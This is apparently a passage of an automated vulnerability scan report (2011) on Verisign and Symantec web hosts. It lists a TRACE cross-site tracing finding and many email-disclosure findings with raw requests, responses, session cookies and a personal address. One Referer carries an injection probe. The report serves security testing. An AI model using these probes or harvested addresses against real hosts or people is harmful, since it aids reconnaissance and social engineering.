next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://press.verisign.com
Path:
/
Request
TRACE / HTTP/1.0 Host: press.verisign.com Cookie: dfcbafb64e98c2be
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:42:31 GMT Server: Apache/2.2.3 (CentOS) Connection: close Content-Type: message/http TRACE / HTTP/1.0 Host: press.verisign.com Cookie: dfcbafb64e98c2be ; JSESSIONID=9B66B2337E3BDAC61E4B94714CBA6DB4; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(...[SNIP]...
17. Email addresses disclosed
previous
next
There are 71 instances of this issue:
Issue background
The presence of email addresses within application responses does not necessarily constitute a security vulnerability. Email addresses may appear intentionally within contact information, and many applications (such as web mail) include arbitrary third-party email addresses within their core content. However, email addresses of developers and other individuals (whether appearing on-screen or hidden within page source) may disclose information that is useful to an attacker; for example, they may represent usernames that can be used at the application's login, and they may be used in social engineering attacks against the organisation's personnel. Unnecessary or excessive disclosure of email addresses may also lead to an increase in the volume of spam email received.
Issue remediation
You should review the email addresses being disclosed by the application, and consider removing any that are unnecessary, or replacing personal addresses with anonymous mailbox addresses (such as helpdesk@example.com).
17.1. http://blogs.verisign.com/
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://blogs.verisign.com
Path:
/
Issue detail
The following email address was disclosed in the response:channel-partners@verisign.com
Request
GET /?tid=footer HTTP/1.1 Host: blogs.verisign.com Proxy-Connection: keep-alive Referer: http://query.verisign.com/search?q=xss&site=vrsn&client=vrsn_frontend&output=xml_no_dtd&proxystylesheet=vrsn_frontend User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: v1st=1744DAB8D140F63E; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.2.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); mbox=check#true#1315621577|session#1315621455064-973488#1315623377|PC#1315621455064-973488.19#1378693517
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:26:10 GMT Server: Apache Last-Modified: Wed, 11 May 2011 20:19:01 GMT ETag: "1a606f6-9f7a-c8827740" Accept-Ranges: bytes Content-Length: 40826 Content-Type: text/html; charset=UTF-8 Connection: close <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Strict//EN"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <meta http-equiv="X-UA-Compatible" content="IE=7" /> <...[SNIP]... <a href="mailto:channel-partners@verisign.com ?tid=gnpartners">...[SNIP]...
17.2. http://blogs.verisign.com/web-user-experience/
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://blogs.verisign.com
Path:
/web-user-experience/
Issue detail
The following email address was disclosed in the response:
Request
GET /web-user-experience/ HTTP/1.1 Host: blogs.verisign.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:36:59 GMT Server: Apache Accept-Ranges: bytes X-Powered-By: PHP/5.0.4 Content-Type: text/html; charset=UTF-8 Connection: close Content-Length: 70620 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" id="sixapart-standard"> <head> <tit...[SNIP]... <a href="contact'>mailto:reshma.kumar@gmail.com ">...[SNIP]...
17.3. http://cdn.verisign.com/assets/shared/js/jquery.cookie.js
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://cdn.verisign.com
Path:
/assets/shared/js/jquery.cookie.js
Issue detail
The following email address was disclosed in the response:
Request
GET /assets/shared/js/jquery.cookie.js HTTP/1.1 Host: cdn.verisign.com Proxy-Connection: keep-alive Referer: http://www.verisign.com/code-signing/index.html?tid=a_box User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTHID=6A3B7886DB2A10DB4D019F6CAED9DACC; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.6.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); mbox=session#1315621455064-973488#1315623519|PC#1315621455064-973488.19#1378693659|check#true#1315621719
Response
HTTP/1.1 200 OK Server: Apache Accept-Ranges: bytes Content-Type: application/x-javascript Vary: Accept-Encoding Age: 6982 Date: Fri, 09 Sep 2011 21:27:08 GMT Last-Modified: Wed, 19 Jan 2011 20:34:23 GMT Expires: Sun, 09 Oct 2011 13:03:09 GMT Content-Length: 4341 Connection: keep-alive /** * Cookie plugin * * Copyright (c) 2006 Klaus Hartl (stilbuero.de) * Dual licensed under the MIT and GPL licenses: * http://www.opensource.org/licenses/mit-license.php * http://www.gnu....[SNIP]... ll be set and the cookie transmission will * require a secure protocol (like HTTPS). * @type undefined * * @name $.cookie * @cat Plugins/Cookie * @author Klaus Hartl/klaus.hartl@stilbuero.de */ /** * Get the value of a cookie with the given name. * * @example $.cookie('the_cookie'); * @desc Get the value of a cookie. * * @param String name The name of the cookie. * @return The value of the cookie. * @type String * * @name $.cookie * @cat Plugins/Cookie * @author Klaus Hartl/klaus.hartl@stilbuero.de */ jQuery.cookie = function(name, value, options) { if (typeof value != 'undefined') { // name and value given, set cookie options = options || {}; if (value === null) { ...[SNIP]...
17.4. https://cdn.verisign.com/authweb/global/assets/shared/js/jquery.hover_intent.js
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://cdn.verisign.com
Path:
/authweb/global/assets/shared/js/jquery.hover_intent.js
Issue detail
The following email address was disclosed in the response:
Request
GET /authweb/global/assets/shared/js/jquery.hover_intent.js HTTP/1.1 Host: cdn.verisign.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: EdgePrismSSL Date: Fri, 09 Sep 2011 21:38:28 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.13 Cache-Control: max-age=2592000, public Age: 39037 Expires: Sun, 09 Oct 2011 10:47:51 GMT Content-Length: 1614 /** * hoverIntent r5 // 2007.03.27 // jQuery 1.1.2+ * <http://cherne.net/brian/resources/jquery.hoverIntent.html> * * @param f onMouseOver function || An object with configuration options * @p...[SNIP]... <brian@cherne.net >...[SNIP]...
17.5. https://enterprise-ssl-admin.verisign.com/
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://enterprise-ssl-admin.verisign.com
Path:
/
Issue detail
The following email address was disclosed in the response:enterprise-sslsupport@verisign.com
Request
GET / HTTP/1.1 Host: enterprise-ssl-admin.verisign.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 403 Forbidden Server: Sun-ONE-Web-Server/6.1 Date: Fri, 09 Sep 2011 21:41:53 GMT Content-length: 1304 Content-type: text/html Connection: close <HTML> <HEAD> <TITLE>HTTP 403 Forbidden: Invalid Certificate for Client Authentication</TITLE> <link href="../stylesheet.css" rel="stylesheet" type="text/css" /> </HEAD> <BODY> <table width=720 bord...[SNIP]... <A HREF="mailto: enterprise-sslsupport@verisign.com ">...[SNIP]...
17.6. https://fileconnect.symantec.com/javascript/calendar2.js
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://fileconnect.symantec.com
Path:
/javascript/calendar2.js
Issue detail
The following email addresses were disclosed in the response:feedback@softcomplex.com sales@softcomplex.com
Request
GET /javascript/calendar2.js HTTP/1.1 Host: fileconnect.symantec.com Connection: keep-alive Referer: https://fileconnect.symantec.com/licenselogin.jsp?localeStr=en_USba9ab%22%3b528b7643cdb User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: s_vi=[CS]v1|2735422985161DC5-600001A3801B01DD[CE]; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621927_PCT-1315622275_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; s_sq=%5B%5BB%5D%5D; s_sv_112_s1=1@16@a//1315621570007; s_sv_112_p1=1@26@s/6036/5742/5736/5417&e/12; s_pers=%20s_nr%3D1315622498618-New%7C1336358498618%3B%20event69%3Devent69%7C1336358498621%3B; s_sess=%20s_sv_sid%3D806960442771%3B%20init_search%3Dxss%3B%20s_cc%3Dtrue%3B%20s_sq%3Dveritasbizmarketing%253D%252526pid%25253Den%2525252Fus%2525253A%25252520biz%2525253A%25252520products%2525253A%25252520categories%2525253A%25252520security%2525252C%25252520backup%25252520%25252526%25252520archiving%2525252C%25252520server%25252520management%2525252C%25252520and%25252520storage%25252520software%25252520%2525257C%25252520symantec%25252520enterprise%25252520products%252526pidt%25253D1%252526oid%25253Dhttp%2525253A%2525252F%2525252Fwww.symantec.com%2525252Fimages%2525252Fmasthead%2525252Fsym-search-arrow.gif%252526ot%25253DIMAGE%2526symantecstoresmb%252C%2520veritasnonconsumer%252C%2520symanteccom%253D%252526pid%25253Den%25252Fus%2525253ASMBStore%2525253ALRC%2525253AChat%25252520Form%252526pidt%25253D1%252526oid%25253Dmailto%2525253Asales%252540symantecsmbrenewals.com%252526ot%25253DA%3B
Response
HTTP/1.1 200 OK Server: Sun-ONE-Web-Server/6.1 Date: Fri, 09 Sep 2011 22:03:54 GMT Content-length: 6722 Last-Modified: Sat, 21 May 2011 05:26:42 GMT Accept-Ranges: bytes // Title: Tigra Calendar // Description: See the demo at url // URL: http://www.softcomplex.com/products/tigra_calendar/ // Version: 3.1 (American date format) // Date: 08-08-2002 (mm-dd-yyyy) // Feedback: feedback@softcomplex.com (specify product title in the subject) // Note: Permission given to use this script in ANY kind of applications if // header lines are left unchanged. // Note: Script consists of two files: calendar?.js and calendar.html // About us: Our company provides offshore IT consulting services. // Contact us at sales@softcomplex.com if you have any programming task you // want to be handled by professionals. Our typical hourly rate is $20. // if two digit year input dates after this year considered 20 century. var NUM_CEN...[SNIP]...
17.7. https://idprotect.verisign.com/learnmore.v
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://idprotect.verisign.com
Path:
/learnmore.v
Issue detail
The following email address was disclosed in the response:
Request
GET /learnmore.v HTTP/1.1 Host: idprotect.verisign.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: https://idprotect.verisign.com/toolbar/download.v Cookie: JSESSIONID=B9C7C9F0BB0FA2EAFB424CDD517510A3.moped1be-d1-tc
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:50:38 GMT Content-Type: text/html Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Content-Length: 11736 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"> <head>...[SNIP]... <a name="header-email" target="_top" href="mailto:vip-support@verisign.com ">...[SNIP]...
17.8. https://idprotect.verisign.com/orderstart.v
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://idprotect.verisign.com
Path:
/orderstart.v
Issue detail
The following email address was disclosed in the response:
Request
GET /orderstart.v HTTP/1.1 Host: idprotect.verisign.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: https://idprotect.verisign.com/wheretouse.v Cookie: JSESSIONID=B9C7C9F0BB0FA2EAFB424CDD517510A3.moped1be-d1-tc
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:50:55 GMT Content-Type: text/html Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Content-Length: 16954 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"> <head>...[SNIP]... <a name="header-email" target="_top" href="mailto:vip-support@verisign.com ">...[SNIP]...
17.9. https://idprotect.verisign.com/toolbar/activate.v
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://idprotect.verisign.com
Path:
/toolbar/activate.v
Issue detail
The following email address was disclosed in the response:
Request
GET /toolbar/activate.v HTTP/1.1 Accept: text/html, application/xhtml+xml, */* Accept-Language: en-US User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0) Accept-Encoding: gzip, deflate Host: idprotect.verisign.com Connection: Keep-Alive
Response
HTTP/1.0 200 OK Date: Fri, 09 Sep 2011 21:47:43 GMT Content-Type: text/html;charset=utf-8 Content-Length: 5737 Connection: close <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"> <head>...[SNIP]... <a name="header-email" target="_top" href="mailto:vip-support@verisign.com ">...[SNIP]...
17.10. https://idprotect.verisign.com/toolbar/download.v
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://idprotect.verisign.com
Path:
/toolbar/download.v
Issue detail
The following email address was disclosed in the response:
Request
GET /toolbar/download.v HTTP/1.1 Host: idprotect.verisign.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: https://idprotect.verisign.com/toolbar/home.v Cookie: JSESSIONID=B9C7C9F0BB0FA2EAFB424CDD517510A3.moped1be-d1-tc
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:47:39 GMT Content-Type: text/html Content-Length: 6532 Keep-Alive: timeout=15, max=100 Connection: Keep-Alive <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"> <head>...[SNIP]... <a name="header-email" target="_top" href="mailto:vip-support@verisign.com ">...[SNIP]...
17.11. https://idprotect.verisign.com/toolbar/home.v
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://idprotect.verisign.com
Path:
/toolbar/home.v
Issue detail
The following email address was disclosed in the response:
Request
GET /toolbar/home.v HTTP/1.1 Host: idprotect.verisign.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.0 200 OK Date: Fri, 09 Sep 2011 21:42:02 GMT Content-Type: text/html Connection: close <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"> <head>...[SNIP]... <a name="header-email" target="_top" href="mailto:vip-support@verisign.com ">...[SNIP]...
17.12. https://idprotect.verisign.com/toolbar/install.v
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://idprotect.verisign.com
Path:
/toolbar/install.v
Issue detail
The following email address was disclosed in the response:
Request
GET /toolbar/install.v HTTP/1.1 Host: idprotect.verisign.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: https://idprotect.verisign.com/toolbar/download.v Cookie: JSESSIONID=B9C7C9F0BB0FA2EAFB424CDD517510A3.moped1be-d1-tc
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:47:40 GMT Content-Type: text/html Content-Length: 6820 Keep-Alive: timeout=15, max=100 Connection: Keep-Alive <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"> <head>...[SNIP]... <a name="header-email" target="_top" href="mailto:vip-support@verisign.com ">...[SNIP]...
17.13. https://idprotect.verisign.com/wheretouse.v
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://idprotect.verisign.com
Path:
/wheretouse.v
Issue detail
The following email address was disclosed in the response:
Request
GET /wheretouse.v HTTP/1.1 Host: idprotect.verisign.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.0 200 OK Date: Fri, 09 Sep 2011 21:42:02 GMT Content-Type: text/html Connection: close <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"> <head>...[SNIP]... <a name="header-email" target="_top" href="mailto:vip-support@verisign.com ">...[SNIP]...
17.14. https://knowledge.verisign.ch/support/code-signing-support/index.html
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://knowledge.verisign.ch
Path:
/support/code-signing-support/index.html
Issue detail
The following email address was disclosed in the response:channel-partners@verisign.com
Request
GET /support/code-signing-support/index.html HTTP/1.1 Host: knowledge.verisign.ch Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.0 200 OK Date: Fri, 09 Sep 2011 21:43:01 GMT Server: Apache-Coyote/1.1 Content-Type: text/html;charset=UTF-8 Connection: close <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://w...[SNIP]... <a href="mailto:channel-partners@verisign.com ?tid=gnpartners">...[SNIP]...
17.15. https://knowledge.verisign.ch/support/digital-id-support/index.html
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://knowledge.verisign.ch
Path:
/support/digital-id-support/index.html
Issue detail
The following email address was disclosed in the response:channel-partners@verisign.com
Request
GET /support/digital-id-support/index.html HTTP/1.1 Host: knowledge.verisign.ch Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.0 200 OK Date: Fri, 09 Sep 2011 21:43:04 GMT Server: Apache-Coyote/1.1 Content-Type: text/html;charset=UTF-8 Connection: close <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://w...[SNIP]... <a href="mailto:channel-partners@verisign.com ?tid=gnpartners">...[SNIP]...
17.16. https://knowledge.verisign.ch/support/mpki-support/index.html
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://knowledge.verisign.ch
Path:
/support/mpki-support/index.html
Issue detail
The following email address was disclosed in the response:channel-partners@verisign.com
Request
GET /support/mpki-support/index.html HTTP/1.1 Host: knowledge.verisign.ch Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.0 200 OK Date: Fri, 09 Sep 2011 21:43:13 GMT Server: Apache-Coyote/1.1 Content-Type: text/html;charset=UTF-8 Connection: close <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://w...[SNIP]... <a href="mailto:channel-partners@verisign.com ?tid=gnpartners">...[SNIP]...
17.17. https://knowledge.verisign.ch/support/ssl-certificates-support/index
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://knowledge.verisign.ch
Path:
/support/ssl-certificates-support/index
Issue detail
The following email addresses were disclosed in the response:channel-partners@verisign.com support@verisign.ch
Request
GET /support/ssl-certificates-support/index?page=content&actp=CROSSLINK&id=AR1601 HTTP/1.1 Host: knowledge.verisign.ch Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.0 200 OK Date: Fri, 09 Sep 2011 21:42:33 GMT Server: Apache-Coyote/1.1 Content-Type: text/html;charset=UTF-8 Connection: close <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitio...[SNIP]... <a href="mailto:channel-partners@verisign.com ?tid=gnpartners">...[SNIP]... <a target="_blank" href="javascript:location.href='mailto:'+String.fromCharCode(115,117,112,112,111,114,116,64,118,101,114,105,115,105,103,110,46,99,104)+'?'">support@verisign.ch </a>...[SNIP]... <a href="javascript:location.href='mailto:'+String.fromCharCode(115,117,112,112,111,114,116,64,118,101,114,105,115,105,103,110,46,99,104)+'?'">support@verisign.ch </a>...[SNIP]...
17.18. https://knowledge.verisign.ch/support/ssl-certificates-support/index.html
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://knowledge.verisign.ch
Path:
/support/ssl-certificates-support/index.html
Issue detail
The following email address was disclosed in the response:channel-partners@verisign.com
Request
GET /support/ssl-certificates-support/index.html HTTP/1.1 Host: knowledge.verisign.ch Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.0 200 OK Date: Fri, 09 Sep 2011 21:42:28 GMT Server: Apache-Coyote/1.1 Content-Type: text/html;charset=UTF-8 Connection: close <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://w...[SNIP]... <a href="mailto:channel-partners@verisign.com ?tid=gnpartners">...[SNIP]...
17.19. https://knowledge.verisign.ch/support/trust-seal-support/index.html
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://knowledge.verisign.ch
Path:
/support/trust-seal-support/index.html
Issue detail
The following email address was disclosed in the response:channel-partners@verisign.com
Request
GET /support/trust-seal-support/index.html HTTP/1.1 Host: knowledge.verisign.ch Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.0 200 OK Date: Fri, 09 Sep 2011 21:43:01 GMT Server: Apache-Coyote/1.1 Content-Type: text/html;charset=UTF-8 Connection: close <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://w...[SNIP]... <a href="mailto:channel-partners@verisign.com ?tid=gnpartners">...[SNIP]...
17.20. https://knowledge.verisign.com/apps/infocenter/sites/verisign/js/jquery.hover_intent.js
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://knowledge.verisign.com
Path:
/apps/infocenter/sites/verisign/js/jquery.hover_intent.js
Issue detail
The following email address was disclosed in the response:
Request
GET /apps/infocenter/sites/verisign/js/jquery.hover_intent.js HTTP/1.1 Host: knowledge.verisign.com Connection: keep-alive Referer: https://knowledge.verisign.com/support/mpki-for-ssl-support/index?page=content&id=AR1295&pmv=print&actp=PRINT&viewlocale=fr_FR User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: v1st=1744DAB8D140F63E; mbox=check#true#1315621614|session#1315621455064-973488#1315623414|PC#1315621455064-973488.19#1378693554; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.3.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); JSESSIONID=44BE2FA4819F216406CBA2DF030D4F7C
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:25:29 GMT Server: Apache Last-Modified: Thu, 18 Aug 2011 11:31:30 GMT ETag: "34cc8-64e-4aac5f440a880" Accept-Ranges: bytes Content-Length: 1614 Keep-Alive: timeout=15 Connection: Keep-Alive Content-Type: application/x-javascript /** * hoverIntent r5 // 2007.03.27 // jQuery 1.1.2+ * <http://cherne.net/brian/resources/jquery.hoverIntent.html> * * @param f onMouseOver function || An object with configuration options * @p...[SNIP]... <brian@cherne.net >...[SNIP]...
17.21. https://knowledge.verisign.com/support/code-signing-support/index
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://knowledge.verisign.com
Path:
/support/code-signing-support/index
Issue detail
The following email address was disclosed in the response:channel-partners@verisign.com
Request
GET /support/code-signing-support/index?page=content&id=AR185 HTTP/1.1 Host: knowledge.verisign.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.0 200 OK Date: Fri, 09 Sep 2011 21:44:36 GMT Server: Apache-Coyote/1.1 Content-Type: text/html;charset=UTF-8 Connection: close <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitio...[SNIP]... <a href="mailto:channel-partners@verisign.com ?tid=gnpartners">...[SNIP]...
17.22. https://knowledge.verisign.com/support/code-signing-support/index.html
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://knowledge.verisign.com
Path:
/support/code-signing-support/index.html
Issue detail
The following email address was disclosed in the response:channel-partners@verisign.com
Request
GET /support/code-signing-support/index.html HTTP/1.1 Host: knowledge.verisign.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.0 200 OK Date: Fri, 09 Sep 2011 21:44:18 GMT Server: Apache-Coyote/1.1 Content-Type: text/html;charset=UTF-8 Connection: close <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://w...[SNIP]... <a href="mailto:channel-partners@verisign.com ?tid=gnpartners">...[SNIP]...
17.23. https://knowledge.verisign.com/support/digital-id-support/index.html
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://knowledge.verisign.com
Path:
/support/digital-id-support/index.html
Issue detail
The following email address was disclosed in the response:channel-partners@verisign.com
Request
GET /support/digital-id-support/index.html?tid=gnsupport HTTP/1.1 Host: knowledge.verisign.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.0 200 OK Date: Fri, 09 Sep 2011 21:44:40 GMT Server: Apache-Coyote/1.1 Content-Type: text/html;charset=UTF-8 Connection: close <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://w...[SNIP]... <a href="mailto:channel-partners@verisign.com ?tid=gnpartners">...[SNIP]...
17.24. https://knowledge.verisign.com/support/eca-support/index.html
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://knowledge.verisign.com
Path:
/support/eca-support/index.html
Issue detail
The following email address was disclosed in the response:channel-partners@verisign.com
Request
GET /support/eca-support/index.html HTTP/1.1 Host: knowledge.verisign.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.0 200 OK Date: Fri, 09 Sep 2011 21:44:40 GMT Server: Apache-Coyote/1.1 Content-Type: text/html;charset=UTF-8 Connection: close <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://w...[SNIP]... <a href="mailto:channel-partners@verisign.com ?tid=gnpartners">...[SNIP]...
17.25. https://knowledge.verisign.com/support/mpki-for-ssl-support/apps/infocenter/resources/js/smart-btn.js
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://knowledge.verisign.com
Path:
/support/mpki-for-ssl-support/apps/infocenter/resources/js/smart-btn.js
